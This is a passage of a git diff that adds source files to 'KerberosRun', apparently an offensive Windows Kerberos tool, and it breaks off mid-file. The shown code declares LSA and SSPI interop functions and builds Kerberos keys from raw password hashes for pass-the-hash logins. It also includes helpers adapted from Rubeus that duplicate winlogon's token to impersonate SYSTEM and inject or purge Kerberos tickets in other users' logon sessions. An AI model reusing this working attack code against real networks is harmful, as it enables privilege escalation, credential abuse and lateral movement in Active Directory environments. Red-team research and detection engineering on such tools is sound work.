+                pvBuffer = Marshal.AllocHGlobal(bufferSize);
+            }
+
+            public SecBuffer(byte[] secBufferBytes)
+            {
+                cbBuffer = secBufferBytes.Length;
+                BufferType = (int)SecBufferType.SECBUFFER_TOKEN;
+                pvBuffer = Marshal.AllocHGlobal(cbBuffer);
+                Marshal.Copy(secBufferBytes, 0, pvBuffer, cbBuffer);
+            }
+
+            public SecBuffer(byte[] secBufferBytes, SecBufferType bufferType)
+            {
+                cbBuffer = secBufferBytes.Length;
+                BufferType = (int)bufferType;
+                pvBuffer = Marshal.AllocHGlobal(cbBuffer);
+                Marshal.Copy(secBufferBytes, 0, pvBuffer, cbBuffer);
+            }
+
+            public void Dispose()
+            {
+                if (pvBuffer != IntPtr.Zero)
+                {
+                    Marshal.FreeHGlobal(pvBuffer);
+                    pvBuffer = IntPtr.Zero;
+                }
+            }
+        }
+
+        public struct MultipleSecBufferHelper
+        {
+            public byte[] Buffer;
+            public SecBufferType BufferType;
+
+            public MultipleSecBufferHelper(byte[] buffer, SecBufferType bufferType)
+            {
+                if (buffer == null || buffer.Length == 0)
+                {
+                    throw new ArgumentException("buffer cannot be null or 0 length");
+                }
+
+                Buffer = buffer;
+                BufferType = bufferType;
+            }
+        };
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SecBufferDesc : IDisposable
+        {
+
+            public int ulVersion;
+            public int cBuffers;
+            public IntPtr pBuffers; //Point to SecBuffer
+
+            public SecBufferDesc(int bufferSize)
+            {
+                ulVersion = (int)SecBufferType.SECBUFFER_VERSION;
+                cBuffers = 1;
+                SecBuffer ThisSecBuffer = new SecBuffer(bufferSize);
+                pBuffers = Marshal.AllocHGlobal(Marshal.SizeOf(ThisSecBuffer));
+                Marshal.StructureToPtr(ThisSecBuffer, pBuffers, false);
+            }
+
+            public SecBufferDesc(byte[] secBufferBytes)
+            {
+                ulVersion = (int)SecBufferType.SECBUFFER_VERSION;
+                cBuffers = 1;
+                SecBuffer ThisSecBuffer = new SecBuffer(secBufferBytes);
+                pBuffers = Marshal.AllocHGlobal(Marshal.SizeOf(ThisSecBuffer));
+                Marshal.StructureToPtr(ThisSecBuffer, pBuffers, false);
+            }
+
+            public SecBufferDesc(MultipleSecBufferHelper[] secBufferBytesArray)
+            {
+                if (secBufferBytesArray == null || secBufferBytesArray.Length == 0)
+                {
+                    throw new ArgumentException("secBufferBytesArray cannot be null or 0 length");
+                }
+
+                ulVersion = (int)SecBufferType.SECBUFFER_VERSION;
+                cBuffers = secBufferBytesArray.Length;
+
+                //Allocate memory for SecBuffer Array....
+                pBuffers = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(SecBuffer)) * cBuffers);
+
+                for (int Index = 0; Index < secBufferBytesArray.Length; Index++)
+                {
+                    //Super hack: Now allocate memory for the individual SecBuffers
+                    //and just copy the bit values to the SecBuffer array!!!
+                    SecBuffer ThisSecBuffer = new SecBuffer(secBufferBytesArray[Index].Buffer, secBufferBytesArray[Index].BufferType);
+
+                    //We will write out bits in the following order:
+                    //int cbBuffer;
+                    //int BufferType;
+                    //pvBuffer;
+                    //Note that we won't be releasing the memory allocated by ThisSecBuffer until we
+                    //are disposed...
+                    int CurrentOffset = Index * Marshal.SizeOf(typeof(SecBuffer));
+                    Marshal.WriteInt32(pBuffers, CurrentOffset, ThisSecBuffer.cbBuffer);
+                    Marshal.WriteInt32(pBuffers, CurrentOffset + Marshal.SizeOf(ThisSecBuffer.cbBuffer), ThisSecBuffer.BufferType);
+                    Marshal.WriteIntPtr(pBuffers, CurrentOffset + Marshal.SizeOf(ThisSecBuffer.cbBuffer) + Marshal.SizeOf(ThisSecBuffer.BufferType), ThisSecBuffer.pvBuffer);
+                }
+            }
+
+            public void Dispose()
+            {
+                if (pBuffers != IntPtr.Zero)
+                {
+                    if (cBuffers == 1)
+                    {
+                        SecBuffer ThisSecBuffer = (SecBuffer)Marshal.PtrToStructure(pBuffers, typeof(SecBuffer));
+                        ThisSecBuffer.Dispose();
+                    }
+                    else
+                    {
+                        for (int Index = 0; Index < cBuffers; Index++)
+                        {
+                            //The bits were written out the following order:
+                            //int cbBuffer;
+                            //int BufferType;
+                            //pvBuffer;
+                            //What we need to do here is to grab a hold of the pvBuffer allocate by the individual
+                            //SecBuffer and release it...
+                            int CurrentOffset = Index * Marshal.SizeOf(typeof(SecBuffer));
+                            IntPtr SecBufferpvBuffer = Marshal.ReadIntPtr(pBuffers, CurrentOffset + Marshal.SizeOf(typeof(int)) + Marshal.SizeOf(typeof(int)));
+                            Marshal.FreeHGlobal(SecBufferpvBuffer);
+                        }
+                    }
+
+                    Marshal.FreeHGlobal(pBuffers);
+                    pBuffers = IntPtr.Zero;
+                }
+            }
+
+            public byte[] GetSecBufferByteArray()
+            {
+                byte[] Buffer = null;
+
+                if (pBuffers == IntPtr.Zero)
+                {
+                    throw new InvalidOperationException("Object has already been disposed!!!");
+                }
+
+                if (cBuffers == 1)
+                {
+                    SecBuffer ThisSecBuffer = (SecBuffer)Marshal.PtrToStructure(pBuffers, typeof(SecBuffer));
+
+                    if (ThisSecBuffer.cbBuffer > 0)
+                    {
+                        Buffer = new byte[ThisSecBuffer.cbBuffer];
+                        Marshal.Copy(ThisSecBuffer.pvBuffer, Buffer, 0, ThisSecBuffer.cbBuffer);
+                    }
+                }
+                else
+                {
+                    int BytesToAllocate = 0;
+
+                    for (int Index = 0; Index < cBuffers; Index++)
+                    {
+                        //The bits were written out the following order:
+                        //int cbBuffer;
+                        //int BufferType;
+                        //pvBuffer;
+                        //What we need to do here calculate the total number of bytes we need to copy...
+                        int CurrentOffset = Index * Marshal.SizeOf(typeof(SecBuffer));
+                        BytesToAllocate += Marshal.ReadInt32(pBuffers, CurrentOffset);
+                    }
+
+                    Buffer = new byte[BytesToAllocate];
+
+                    for (int Index = 0, BufferIndex = 0; Index < cBuffers; Index++)
+                    {
+                        //The bits were written out the following order:
+                        //int cbBuffer;
+                        //int BufferType;
+                        //pvBuffer;
+                        //Now iterate over the individual buffers and put them together into a
+                        //byte array...
+                        int CurrentOffset = Index * Marshal.SizeOf(typeof(SecBuffer));
+                        int BytesToCopy = Marshal.ReadInt32(pBuffers, CurrentOffset);
+                        IntPtr SecBufferpvBuffer = Marshal.ReadIntPtr(pBuffers, CurrentOffset + Marshal.SizeOf(typeof(int)) + Marshal.SizeOf(typeof(int)));
+                        Marshal.Copy(SecBufferpvBuffer, Buffer, BufferIndex, BytesToCopy);
+                        BufferIndex += BytesToCopy;
+                    }
+                }
+
+                return (Buffer);
+            }
+        }
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SECURITY_INTEGER
+        {
+            public uint LowPart;
+            public int HighPart;
+            public SECURITY_INTEGER(int dummy)
+            {
+                LowPart = 0;
+                HighPart = 0;
+            }
+        };
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SECURITY_HANDLE
+        {
+            public IntPtr LowPart;
+            public IntPtr HighPart;
+            public SECURITY_HANDLE(int dummy)
+            {
+                LowPart = HighPart = IntPtr.Zero;
+            }
+        };
+
+        [StructLayout(LayoutKind.Sequential)]
+        public struct SecPkgContext_Sizes
+        {
+            public uint cbMaxToken;
+            public uint cbMaxSignature;
+            public uint cbBlockSize;
+            public uint cbSecurityTrailer;
+        };
+
+
+
+        // functions
+        // Adapted from Vincent LE TOUX' "MakeMeEnterpriseAdmin"
+        [DllImport("cryptdll.Dll", CharSet = CharSet.Auto, SetLastError = false)]
+        public static extern int CDLocateCSystem(KERB_ETYPE type, out IntPtr pCheckSum);
+
+        [DllImport("cryptdll.Dll", CharSet = CharSet.Auto, SetLastError = false)]
+        public static extern int CDLocateCheckSum(KERB_CHECKSUM_ALGORITHM type, out IntPtr pCheckSum);
+
+        //  https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/master/MakeMeEnterpriseAdmin.ps1#L1753-L1767
+        public delegate int KERB_ECRYPT_Initialize(byte[] Key, int KeySize, int KeyUsage, out IntPtr pContext);
+        public delegate int KERB_ECRYPT_Encrypt(IntPtr pContext, byte[] data, int dataSize, byte[] output, ref int outputSize);
+        public delegate int KERB_ECRYPT_Decrypt(IntPtr pContext, byte[] data, int dataSize, byte[] output, ref int outputSize);
+        public delegate int KERB_ECRYPT_Finish(ref IntPtr pContext);
+
+        public delegate int KERB_ECRYPT_HashPassword(UNICODE_STRING Password, UNICODE_STRING Salt, int count, byte[] output);
+
+        //https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/master/MakeMeEnterpriseAdmin.ps1#L1760-L1767
+        public delegate int KERB_CHECKSUM_Initialize(int unk0, out IntPtr pContext);
+        public delegate int KERB_CHECKSUM_Sum(IntPtr pContext, int Size, byte[] Buffer);
+        public delegate int KERB_CHECKSUM_Finalize(IntPtr pContext, byte[] Buffer);
+        public delegate int KERB_CHECKSUM_Finish(ref IntPtr pContext);
+        public delegate int KERB_CHECKSUM_InitializeEx(byte[] Key, int KeySize, int KeyUsage, out IntPtr pContext);
+
+
+        [DllImport("Netapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        public static extern int DsGetDcName(
+            [MarshalAs(UnmanagedType.LPTStr)] string ComputerName,
+            [MarshalAs(UnmanagedType.LPTStr)] string DomainName,
+            [In] int DomainGuid,
+            [MarshalAs(UnmanagedType.LPTStr)] string SiteName,
+            [MarshalAs(UnmanagedType.U4)] DSGETDCNAME_FLAGS flags,
+            out IntPtr pDOMAIN_CONTROLLER_INFO);
+
+        [DllImport("Netapi32.dll", SetLastError = true)]
+        public static extern int NetApiBufferFree(IntPtr Buffer);
+
+        // LSA functions
+
+        [DllImport("secur32.dll", SetLastError = false)]
+        public static extern int LsaConnectUntrusted(
+            [Out] out IntPtr LsaHandle
+        );
+
+        [DllImport("secur32.dll", SetLastError = false)]
+        public static extern int LsaLookupAuthenticationPackage(
+            [In] IntPtr LsaHandle,
+            [In] ref LSA_STRING_IN PackageName,
+            [Out] out int AuthenticationPackage
+        );
+
+        [DllImport("kernel32.dll")]
+        public static extern IntPtr LocalAlloc(
+            uint uFlags,
+            uint uBytes
+        );
+
+        [DllImport("advapi32.dll", SetLastError = true)]
+        public static extern uint LsaNtStatusToWinError(
+            uint status
+        );
+
+        [DllImport("advapi32.dll", SetLastError = true, PreserveSig = true)]
+        public static extern uint LsaFreeMemory(
+            IntPtr buffer
+        );
+
+        [DllImport("kernel32.dll", EntryPoint = "CopyMemory", SetLastError = false)]
+        public static extern void CopyMemory(
+            IntPtr dest,
+            IntPtr src,
+            uint count
+        );
+
+        [DllImport("secur32.dll", SetLastError = false)]
+        public static extern int LsaCallAuthenticationPackage(
+            IntPtr LsaHandle,
+            int AuthenticationPackage,
+            IntPtr ProtocolSubmitBuffer,
+            int SubmitBufferLength,
+            out IntPtr ProtocolReturnBuffer,
+            out int ReturnBufferLength,
+            out int ProtocolStatus
+        );
+
+        [DllImport("secur32.dll", SetLastError = false)]
+        public static extern int LsaDeregisterLogonProcess(
+            [In] IntPtr LsaHandle
+        );
+
+        [DllImport("secur32.dll", SetLastError = true)]
+        public static extern int LsaRegisterLogonProcess(
+            LSA_STRING_IN LogonProcessName,
+            out IntPtr LsaHandle,
+            out ulong SecurityMode
+        );
+
+        // for GetSystem()
+        [DllImport("advapi32.dll", SetLastError = true)]
+        [return: MarshalAs(UnmanagedType.Bool)]
+        public static extern bool OpenProcessToken(
+            IntPtr ProcessHandle,
+            UInt32 DesiredAccess,
+            out IntPtr TokenHandle);
+
+        [DllImport("advapi32.dll")]
+        public static extern bool DuplicateToken(
+            IntPtr ExistingTokenHandle,
+            int SECURITY_IMPERSONATION_LEVEL,
+            ref IntPtr DuplicateTokenHandle);
+
+        [DllImport("advapi32.dll", SetLastError = true)]
+        public static extern bool ImpersonateLoggedOnUser(
+            IntPtr hToken);
+
+        [DllImport("advapi32.dll", SetLastError = true)]
+        public static extern bool RevertToSelf();
+
+        [DllImport("kernel32.dll")]
+        public static extern uint GetLastError();
+
+        [DllImport("advapi32.dll", SetLastError = true)]
+        public static extern bool GetTokenInformation(
+            IntPtr TokenHandle,
+            TOKEN_INFORMATION_CLASS TokenInformationClass,
+            IntPtr TokenInformation,
+            int TokenInformationLength,
+            out int ReturnLength);
+
+        [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
+        public static extern bool CreateProcessWithLogonW(
+            String userName,
+            String domain,
+            String password,
+            UInt32 logonFlags,
+            String applicationName,
+            String commandLine,
+            UInt32 creationFlags,
+            UInt32 environment,
+            String currentDirectory,
+            ref STARTUPINFO startupInfo,
+            out PROCESS_INFORMATION processInformation);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        [return: MarshalAs(UnmanagedType.Bool)]
+        public static extern bool CloseHandle(
+            IntPtr hObject
+        );
+
+        [DllImport("Secur32.dll", SetLastError = false)]
+        public static extern int LsaEnumerateLogonSessions(
+            out UInt64 LogonSessionCount,
+            out IntPtr LogonSessionList
+        );
+
+        [DllImport("Secur32.dll", SetLastError = false)]
+        public static extern uint LsaGetLogonSessionData(
+            IntPtr luid,
+            out IntPtr ppLogonSessionData
+        );
+
+        [DllImport("secur32.dll", SetLastError = false)]
+        public static extern uint LsaFreeReturnBuffer(
+            IntPtr buffer
+        );
+
+        // adapted from https://www.pinvoke.net/default.aspx/secur32.InitializeSecurityContext
+        [DllImport("secur32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        public static extern int AcquireCredentialsHandle(
+            string pszPrincipal, //SEC_CHAR*
+            string pszPackage, //SEC_CHAR* //"Kerberos","NTLM","Negotiative"
+            int fCredentialUse,
+            IntPtr PAuthenticationID,//_LUID AuthenticationID,//pvLogonID,//PLUID
+            IntPtr pAuthData,//PVOID
+            int pGetKeyFn, //SEC_GET_KEY_FN
+            IntPtr pvGetKeyArgument, //PVOID
+            ref SECURITY_HANDLE phCredential, //SecHandle //PCtxtHandle ref
+            ref SECURITY_INTEGER ptsExpiry  //PTimeStamp //TimeStamp ref
+        );
+
+        [DllImport("secur32.dll", SetLastError = true)]
+        public static extern int InitializeSecurityContext(
+            ref SECURITY_HANDLE phCredential,//PCredHandle
+            IntPtr phContext, //PCtxtHandle
+            string pszTargetName,
+            int fContextReq,
+            int Reserved1,
+            int TargetDataRep,
+            IntPtr pInput, //PSecBufferDesc SecBufferDesc
+            int Reserved2,
+            out SECURITY_HANDLE phNewContext, //PCtxtHandle
+            out SecBufferDesc pOutput, //PSecBufferDesc SecBufferDesc
+            out uint pfContextAttr, //managed ulong == 64 bits!!!
+            out SECURITY_INTEGER ptsExpiry  //PTimeStamp
+        );
+
+        [DllImport("secur32.dll")]
+        public static extern int DeleteSecurityContext(
+            ref SECURITY_HANDLE phContext
+        );
+
+        [DllImport("secur32.dll", CharSet = CharSet.Auto)]
+        public static extern int FreeCredentialsHandle(
+            [In] ref SECURITY_HANDLE phCredential
+        );
+
+        [DllImport("Secur32.dll")]
+        public static extern int FreeContextBuffer(
+            ref IntPtr pvContextBuffer
+        );
+    }
+}
diff --git a/KerberosRun/KerberosRun/Utils/KerberosHashCreds.cs b/KerberosRun/KerberosRun/Utils/KerberosHashCreds.cs
new file mode 100644
index 0000000..cfbcb23
--- /dev/null
+++ b/KerberosRun/KerberosRun/Utils/KerberosHashCreds.cs
@@ -0,0 +1,55 @@
+using Kerberos.NET.Credentials;
+using Kerberos.NET.Crypto;
+using Kerberos.NET.Entities;
+using System;
+
+namespace KerberosRun.Utils
+{
+    public class KerberosHashCreds : KerberosCredential
+    {
+        private readonly string hash;
+        private readonly EncryptionType etype;
+
+        public KerberosHashCreds(string username, string hash, EncryptionType etype, string domain = null)
+        {
+            if (string.IsNullOrWhiteSpace(username))
+            {
+                throw new ArgumentException("UserName cannot be null", nameof(username));
+            }
+
+            if (string.IsNullOrWhiteSpace(hash))
+            {
+                throw new ArgumentException("Hash cannot be null", nameof(hash));
+            }
+
+            TrySplitUserNameDomain(username, out username, ref domain);
+
+            UserName = username;
+            this.hash = hash;
+            this.etype = etype;
+
+            if (!string.IsNullOrWhiteSpace(domain))
+            {
+                Domain = domain.ToUpperInvariant();
+            }
+        }
+        public override bool SupportsOptimisticPreAuthentication => false;
+
+
+        public override KerberosKey CreateKey()
+        {
+            var principalName = new PrincipalName(PrincipalNameType.NT_PRINCIPAL, Domain, new[] { UserName });
+
+            Byte[] hashbytes = Utils.ToHexByteArray(this.hash);
+            var salt = "";
+            return new KerberosKey(
+                hashbytes,
+                null,
+                principalName,
+                etype: this.etype,
+                saltType: SaltType.ActiveDirectoryUser,
+                salt: salt
+            );
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/Utils/LSA.cs b/KerberosRun/KerberosRun/Utils/LSA.cs
new file mode 100644
index 0000000..4c5a7fc
--- /dev/null
+++ b/KerberosRun/KerberosRun/Utils/LSA.cs
@@ -0,0 +1,326 @@
+//Taken from https://github.com/GhostPack/Rubeus/blob/master/Rubeus/lib/LSA.cs by harmj0y
+
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.Security.Principal;
+using System.ComponentModel;
+
+
+namespace KerberosRun
+{
+    class LSA
+    {
+        public static bool IsHighIntegrity()
+        {
+            // returns true if the current process is running with adminstrative privs in a high integrity context
+            WindowsIdentity identity = WindowsIdentity.GetCurrent();
+            WindowsPrincipal principal = new WindowsPrincipal(identity);
+            return principal.IsInRole(WindowsBuiltInRole.Administrator);
+        }
+
+
+        public static bool GetSystem()
+        {
+            // helper to elevate to SYSTEM for Kerberos ticket enumeration via token impersonation
+            if (IsHighIntegrity())
+            {
+                IntPtr hToken = IntPtr.Zero;
+
+                // Open winlogon's token with TOKEN_DUPLICATE accesss so ca can make a copy of the token with DuplicateToken
+                Process[] processes = Process.GetProcessesByName("winlogon");
+                IntPtr handle = processes[0].Handle;
+
+                // TOKEN_DUPLICATE = 0x0002
+                bool success = Interop.OpenProcessToken(handle, 0x0002, out hToken);
+                if (!success)
+                {
+                    //Console.WriteLine("OpenProcessToken failed!");
+                    return false;
+                }
+
+                // make a copy of the NT AUTHORITY\SYSTEM token from winlogon
+                // 2 == SecurityImpersonation
+                IntPtr hDupToken = IntPtr.Zero;
+                success = Interop.DuplicateToken(hToken, 2, ref hDupToken);
+                if (!success)
+                {
+                    //Console.WriteLine("DuplicateToken failed!");
+                    return false;
+                }
+
+                success = Interop.ImpersonateLoggedOnUser(hDupToken);
+                if (!success)
+                {
+                    //Console.WriteLine("ImpersonateLoggedOnUser failed!");
+                    return false;
+                }
+
+                // clean up the handles we created
+                Interop.CloseHandle(hToken);
+                Interop.CloseHandle(hDupToken);
+
+                string name = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
+                if (name != "NT AUTHORITY\\SYSTEM")
+                {
+                    return false;
+                }
+
+                return true;
+            }
+            else
+            {
+                return false;
+            }
+        }
+
+
+        public static void ImportTicket(byte[] ticket, LUID targetLuid)
+        {
+            // uses LsaCallAuthenticationPackage() with a message type of KERB_SUBMIT_TKT_REQUEST to submit a ticket
+            //  for the current (or specified) logon session
+
+            // straight from Vincent LE TOUX' work
+            //  https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/master/MakeMeEnterpriseAdmin.ps1#L2925-L2971
+
+            var LsaHandle = IntPtr.Zero;
+            int AuthenticationPackage;
+            int ntstatus, ProtocalStatus;
+
+            if ((ulong)targetLuid != 0)
+            {
+                if (!IsHighIntegrity())
+                {
+                    Console.WriteLine("[X] You need to be in high integrity to apply a ticket to a different logon session");
+                    return;
+                }
+                else
+                {
+                    var currentName = WindowsIdentity.GetCurrent().Name;
+                    if (currentName == "NT AUTHORITY\\SYSTEM")
+                    {
+                        // if we're already SYSTEM, we have the proper privilegess to get a Handle to LSA with LsaRegisterLogonProcessHelper
+                        LsaHandle = LsaRegisterLogonProcessHelper();
+                    }
+                    else
+                    {
+                        // elevated but not system, so gotta GetSystem() first
+                        GetSystem();
+                        // should now have the proper privileges to get a Handle to LSA
+                        LsaHandle = LsaRegisterLogonProcessHelper();
+                        // we don't need our NT AUTHORITY\SYSTEM Token anymore so we can revert to our original token
+                        Interop.RevertToSelf();
+                    }
+                }
+            }
+            else
+            {
+                // otherwise use the unprivileged connection with LsaConnectUntrusted
+                ntstatus = Interop.LsaConnectUntrusted(out LsaHandle);
+            }
+
+            var inputBuffer = IntPtr.Zero;
+            IntPtr ProtocolReturnBuffer;
+            int ReturnBufferLength;
+            try
+            {
+                Interop.LSA_STRING_IN LSAString;
+                var Name = "kerberos";
+                LSAString.Length = (ushort)Name.Length;
+                LSAString.MaximumLength = (ushort)(Name.Length + 1);
+                LSAString.Buffer = Name;
+                ntstatus = Interop.LsaLookupAuthenticationPackage(LsaHandle, ref LSAString, out AuthenticationPackage);
+                if (ntstatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ntstatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage: {1}", winError, errorMessage);
+                    return;
+                }
+                var request = new Interop.KERB_SUBMIT_TKT_REQUEST();
+                request.MessageType = Interop.KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage;
+                request.KerbCredSize = ticket.Length;
+                request.KerbCredOffset = Marshal.SizeOf(typeof(Interop.KERB_SUBMIT_TKT_REQUEST));
+
+                if ((ulong)targetLuid != 0)
+                {
+                    Console.WriteLine("[*] Target LUID: 0x{0:x}", (ulong)targetLuid);
+                    request.LogonId = targetLuid;
+                }
+
+                var inputBufferSize = Marshal.SizeOf(typeof(Interop.KERB_SUBMIT_TKT_REQUEST)) + ticket.Length;
+                inputBuffer = Marshal.AllocHGlobal(inputBufferSize);
+                Marshal.StructureToPtr(request, inputBuffer, false);
+                Marshal.Copy(ticket, 0, new IntPtr(inputBuffer.ToInt64() + request.KerbCredOffset), ticket.Length);
+                ntstatus = Interop.LsaCallAuthenticationPackage(LsaHandle, AuthenticationPackage, inputBuffer, inputBufferSize, out ProtocolReturnBuffer, out ReturnBufferLength, out ProtocalStatus);
+                if (ntstatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ntstatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage: {1}", winError, errorMessage);
+                    return;
+                }
+                if (ProtocalStatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ProtocalStatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage (ProtocalStatus): {1}", winError, errorMessage);
+                    return;
+                }
+                Console.WriteLine("[+] Ticket successfully imported!");
+            }
+            finally
+            {
+                if (inputBuffer != IntPtr.Zero)
+                    Marshal.FreeHGlobal(inputBuffer);
+                Interop.LsaDeregisterLogonProcess(LsaHandle);
+            }
+        }
+
+        public static void Purge(LUID targetLuid)
+        {
+            // uses LsaCallAuthenticationPackage() with a message type of KERB_PURGE_TKT_CACHE_REQUEST to purge tickets
+            //  for the current (or specified) logon session
+
+            // straight from Vincent LE TOUX' work
+            //  https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/master/MakeMeEnterpriseAdmin.ps1#L2925-L2971
+
+            var lsaHandle = GetLsaHandle();
+            int AuthenticationPackage;
+            int ntstatus, ProtocalStatus;
+
+            if ((ulong)targetLuid != 0)
+            {
+                if (!IsHighIntegrity())
+                {
+                    Console.WriteLine("[X] You need to be in high integrity to purge tickets from a different logon session");
+                    return;
+                }
+
+            }
+
+            var inputBuffer = IntPtr.Zero;
+            IntPtr ProtocolReturnBuffer;
+            int ReturnBufferLength;
+            try
+            {
+                Interop.LSA_STRING_IN LSAString;
+                var Name = "kerberos";
+                LSAString.Length = (ushort)Name.Length;
+                LSAString.MaximumLength = (ushort)(Name.Length + 1);
+                LSAString.Buffer = Name;
+                ntstatus = Interop.LsaLookupAuthenticationPackage(lsaHandle, ref LSAString, out AuthenticationPackage);
+                if (ntstatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ntstatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage: {1}", winError, errorMessage);
+                    return;
+                }
+
+                var request = new Interop.KERB_PURGE_TKT_CACHE_REQUEST();
+                request.MessageType = Interop.KERB_PROTOCOL_MESSAGE_TYPE.KerbPurgeTicketCacheMessage;
+
+                if ((ulong)targetLuid != 0)
+                {
+                    Console.WriteLine("[*] Target LUID: 0x{0:x}", (ulong)targetLuid);
+                    request.LogonId = targetLuid;
+                }
+
+                var inputBufferSize = Marshal.SizeOf(typeof(Interop.KERB_PURGE_TKT_CACHE_REQUEST));
+                inputBuffer = Marshal.AllocHGlobal(inputBufferSize);
+                Marshal.StructureToPtr(request, inputBuffer, false);
+                ntstatus = Interop.LsaCallAuthenticationPackage(lsaHandle, AuthenticationPackage, inputBuffer, inputBufferSize, out ProtocolReturnBuffer, out ReturnBufferLength, out ProtocalStatus);
+                if (ntstatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ntstatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage: {1}", winError, errorMessage);
+                    return;
+                }
+                if (ProtocalStatus != 0)
+                {
+                    var winError = Interop.LsaNtStatusToWinError((uint)ProtocalStatus);
+                    var errorMessage = new Win32Exception((int)winError).Message;
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage (ProtocolStatus): {1}", winError, errorMessage);
+                    return;
+                }
+                Console.WriteLine("[+] Tickets successfully purged!");
+            }
+            finally
+            {
+                if (inputBuffer != IntPtr.Zero)
+                    Marshal.FreeHGlobal(inputBuffer);
+                Interop.LsaDeregisterLogonProcess(lsaHandle);
+            }
+        }
+
+
+
+        public static IntPtr GetLsaHandle()
+        {
+            // returns a handle to LSA
+            //  uses LsaConnectUntrusted() if not in high integrity
+            //  uses LsaRegisterLogonProcessHelper() if in high integrity
+
+            IntPtr lsaHandle;
+
+            if (!IsHighIntegrity())
+            {
+                int retCode = Interop.LsaConnectUntrusted(out lsaHandle);
+            }
+
+            else
+            {
+                lsaHandle = LsaRegisterLogonProcessHelper();
+
+                // if the original call fails then it is likely we don't have SeTcbPrivilege
+                // to get SeTcbPrivilege we can Impersonate a NT AUTHORITY\SYSTEM Token
+                if (lsaHandle == IntPtr.Zero)
+                {
+                    var currentName = WindowsIdentity.GetCurrent().Name;
+
+                    if (currentName == "NT AUTHORITY\\SYSTEM")
+                    {
+                        // if we're already SYSTEM, we have the proper privilegess to get a Handle to LSA with LsaRegisterLogonProcessHelper
+                        lsaHandle = LsaRegisterLogonProcessHelper();
+                    }
+                    else
+                    {
+                        // elevated but not system, so gotta GetSystem() first
+                        if (!GetSystem())
+                        {
+                            throw new Exception("Could not elevate to system");
+                        }
+                        // should now have the proper privileges to get a Handle to LSA
+                        lsaHandle = LsaRegisterLogonProcessHelper();
+                        // we don't need our NT AUTHORITY\SYSTEM Token anymore so we can revert to our original token
+                        Interop.RevertToSelf();
+                    }
+                }
+            }
+
+            return lsaHandle;
+        }
+
+
+        public static IntPtr LsaRegisterLogonProcessHelper()
+        {
+            // helper that establishes a connection to the LSA server and verifies that the caller is a logon application
+            //  used for Kerberos ticket enumeration for ALL users
+
+            var logonProcessName = "User32LogonProcesss"; // yes I know this is "weird" ;)
+            Interop.LSA_STRING_IN LSAString;
+            var lsaHandle = IntPtr.Zero;
+            UInt64 securityMode = 0;
+
+            LSAString.Length = (ushort)logonProcessName.Length;
+            LSAString.MaximumLength = (ushort)(logonProcessName.Length + 1);
+            LSAString.Buffer = logonProcessName;
+
+            var ret = Interop.LsaRegisterLogonProcess(LSAString, out lsaHandle, out securityMode);
+
+            return lsaHandle;
+        }
+    }
+}
diff --git a/KerberosRun/KerberosRun/Utils/LUID.cs b/KerberosRun/KerberosRun/Utils/LUID.cs
new file mode 100644
index 0000000..43256df
--- /dev/null
+++ b/KerberosRun/KerberosRun/Utils/LUID.cs
@@ -0,0 +1,83 @@
+//Taken from https://github.com/GhostPack/Rubeus/blob/master/Rubeus/lib/Interop/Luid.cs by harmj0y
+
+using System;
+using System.Runtime.InteropServices;
+
+namespace KerberosRun
+{
+    [StructLayout(LayoutKind.Sequential)]
+    public struct LUID
+    {
+        public UInt32 LowPart;
+        public Int32 HighPart;
+
+        public LUID(UInt64 value)
+        {
+            LowPart = (UInt32)(value & 0xffffffffL);
+            HighPart = (Int32)(value >> 32);
+        }
+
+        public LUID(LUID value)
+        {
+            LowPart = value.LowPart;
+            HighPart = value.HighPart;
+        }
+
+        public LUID(string value)
+        {
+            if (System.Text.RegularExpressions.Regex.IsMatch(value, @"^0x[0-9A-Fa-f]+$"))
+            {
+                // if the passed LUID string is of form 0xABC123
+                UInt64 uintVal = Convert.ToUInt64(value, 16);
+                LowPart = (UInt32)(uintVal & 0xffffffffL);
+                HighPart = (Int32)(uintVal >> 32);
+            }
+            else if (System.Text.RegularExpressions.Regex.IsMatch(value, @"^\d+$"))
+            {
+                // if the passed LUID string is a decimal form
+                UInt64 uintVal = UInt64.Parse(value);
+                LowPart = (UInt32)(uintVal & 0xffffffffL);
+                HighPart = (Int32)(uintVal >> 32);
+            }
+            else
+            {
+                System.ArgumentException argEx = new System.ArgumentException("Passed LUID string value is not in a hex or decimal form", value);
+                throw argEx;
+            }
+        }
+
+        public override int GetHashCode()
+        {
+            UInt64 Value = ((UInt64)this.HighPart << 32) + this.LowPart;
+            return Value.GetHashCode();
+        }
+
+        public override bool Equals(object obj)
+        {
+            return obj is LUID && (((ulong)this) == (LUID)obj);
+        }
+
+        public override string ToString()
+        {
+            UInt64 Value = ((UInt64)this.HighPart << 32) + this.LowPart;
